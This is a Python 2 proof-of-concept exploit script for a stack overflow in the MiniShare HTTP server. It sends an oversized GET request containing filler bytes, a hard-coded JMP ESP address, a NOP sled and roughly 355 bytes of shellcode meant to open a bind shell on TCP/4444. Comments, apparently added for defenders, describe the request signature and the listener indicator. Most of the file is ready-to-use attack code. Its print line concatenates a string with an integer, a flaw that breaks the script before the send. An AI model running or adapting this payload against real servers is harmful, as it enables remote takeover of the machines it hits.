minishare_bindShell.py
#!/usr/bin/python
#
# exploit DB URL : https://www.exploit-db.com/exploits/616/
#usage : ./minishare_bindShell.py 192.168.100.10
#
# Proof-of-concept for the MiniShare HTTP server stack overflow referenced
# above: one oversized GET request line is sent to TCP/80 and the socket is
# closed.  Written in Python 2 syntax (print statement, str-typed buffer), so
# it does not run unmodified under Python 3.
#
# Defender notes (limited to what is visible in this file):
#   - Request shape: "GET " + 1787 filler bytes ("A") + a 4-byte address +
#     25 NOP bytes (\x90) + roughly 355 bytes of binary payload + " HTTP/1.1".
#     A request line of ~2 KB containing a long run of a single byte followed
#     by non-printable bytes is the network-level signature.
#   - The 4-byte value is a hard-coded module address (commented as JMP ESP
#     in USER32.DLL; little-endian 0x7e429353), i.e. the PoC assumes a fixed
#     module load base.
#   - The payload bytes are not annotated in the file; the filename and the
#     trailing comment indicate a bind shell on TCP/4444 is expected after
#     delivery, so an unexpected listener on 4444 owned by the MiniShare
#     process is the host-level indicator.
import socket, sys
# Create a TCP socket.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Target host is taken from argv[1] (no argument check); connect to port 80.
sock.connect((sys.argv[1], 80))
# Build the request line: method, overflow filler, return address, NOP
# sled, payload, HTTP version and end of headers.
buffer = "GET "
buffer +="A"*1787                  # filler up to the saved return address
buffer +="\x53\x93\x42\x7e" # JMP ESP USER32.DLL (hard-coded address)
buffer +="\x90"*25                 # 25 x NOP
# Payload bytes as published; 23 rows of 15 bytes plus a final row of 10.
buffer +=("\xba\xd1\x7e\x43\xef\xdb\xd9\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
"\x53\x31\x57\x12\x83\xef\xfc\x03\x86\x70\xa1\x1a\xd4\x65\xa7"
"\xe5\x24\x76\xc8\x6c\xc1\x47\xc8\x0b\x82\xf8\xf8\x58\xc6\xf4"
"\x73\x0c\xf2\x8f\xf6\x99\xf5\x38\xbc\xff\x38\xb8\xed\x3c\x5b"
"\x3a\xec\x10\xbb\x03\x3f\x65\xba\x44\x22\x84\xee\x1d\x28\x3b"
"\x1e\x29\x64\x80\x95\x61\x68\x80\x4a\x31\x8b\xa1\xdd\x49\xd2"
"\x61\xdc\x9e\x6e\x28\xc6\xc3\x4b\xe2\x7d\x37\x27\xf5\x57\x09"
"\xc8\x5a\x96\xa5\x3b\xa2\xdf\x02\xa4\xd1\x29\x71\x59\xe2\xee"
"\x0b\x85\x67\xf4\xac\x4e\xdf\xd0\x4d\x82\x86\x93\x42\x6f\xcc"
"\xfb\x46\x6e\x01\x70\x72\xfb\xa4\x56\xf2\xbf\x82\x72\x5e\x1b"
"\xaa\x23\x3a\xca\xd3\x33\xe5\xb3\x71\x38\x08\xa7\x0b\x63\x45"
"\x04\x26\x9b\x95\x02\x31\xe8\xa7\x8d\xe9\x66\x84\x46\x34\x71"
"\xeb\x7c\x80\xed\x12\x7f\xf1\x24\xd1\x2b\xa1\x5e\xf0\x53\x2a"
"\x9e\xfd\x81\xc7\x96\x58\x7a\xfa\x5b\x1a\x2a\xba\xf3\xf3\x20"
"\x35\x2c\xe3\x4a\x9f\x45\x8c\xb6\x20\x78\x11\x3e\xc6\x10\xb9"
"\x16\x50\x8c\x7b\x4d\x69\x2b\x83\xa7\xc1\xdb\xcc\xa1\xd6\xe4"
"\xcc\xe7\x70\x72\x47\xe4\x44\x63\x58\x21\xed\xf4\xcf\xbf\x7c"
"\xb7\x6e\xbf\x54\x2f\x12\x52\x33\xaf\x5d\x4f\xec\xf8\x0a\xa1"
"\xe5\x6c\xa7\x98\x5f\x92\x3a\x7c\xa7\x16\xe1\xbd\x26\x97\x64"
"\xf9\x0c\x87\xb0\x02\x09\xf3\x6c\x55\xc7\xad\xca\x0f\xa9\x07"
"\x85\xfc\x63\xcf\x50\xcf\xb3\x89\x5c\x1a\x42\x75\xec\xf3\x13"
"\x8a\xc1\x93\x93\xf3\x3f\x04\x5b\x2e\x84\x34\x16\x72\xad\xdc"
"\xff\xe7\xef\x80\xff\xd2\x2c\xbd\x83\xd6\xcc\x3a\x9b\x93\xc9"
"\x07\x1b\x48\xa0\x18\xce\x6e\x17\x18\xdb")
buffer += " HTTP/1.1\r\n\r\n"       # request-line tail and end of headers
# Python 2 print statement.
print "Sending Payload with " + len(buffer)
# Single send of the whole request; no response is read.
sock.send(buffer)
sock.close()
# using nc host 4444 to connect to shell
# (i.e. the author expects a listener on TCP/4444 on the target afterwards)